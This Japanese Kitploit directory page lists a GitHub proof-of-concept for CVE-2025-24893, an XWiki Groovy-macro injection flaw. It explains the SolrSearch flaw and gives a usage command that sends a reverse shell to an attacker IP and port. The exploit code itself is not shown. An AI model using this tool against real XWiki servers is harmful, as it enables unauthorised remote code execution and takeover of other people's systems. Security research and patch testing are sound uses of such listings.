Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24893-Reverse-Shell — CVE-2025-24893用リバースシェルペイロード | Kitploit
ツール/GitHubGitHub/azureadtrent/cve-2025-24893-reverse-shell
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubazureadtrent/cve-2025-24893-reverse-shell

CVE-2025-24893-Reverse-Shell

CVE-2025-24893用リバースシェルペイロード

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

CVE-2025-24893 - XWiki リモートコード実行エクスプロイト

CVE-2025-24893 の PoC – XWiki <groovy> マクロリモートコード実行
Artemir のオリジナル PoC に触発されました


説明

これは、脆弱なバージョンの XWiki におけるリモートコード実行 (RCE) 脆弱性である CVE-2025-24893 の Proof-of-Concept (PoC) エクスプロイトです。

この欠陥は、SolrSearch エンドポイント内でのユーザー入力の不適切なサニタイズにあり、RSS フィードクエリを介してサンドボックス化されていない <groovy> マクロインジェクションに対して脆弱です。

このスクリプトは、async マクロを使用して Groovy ペイロードを注入し、サーバー上でのコマンド実行 を引き起こします。これにより、攻撃者は自身のシステムにリバースシェルをトリガーすることができます。


使用方法

root@kitploit:~
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>
ツールをダウンロード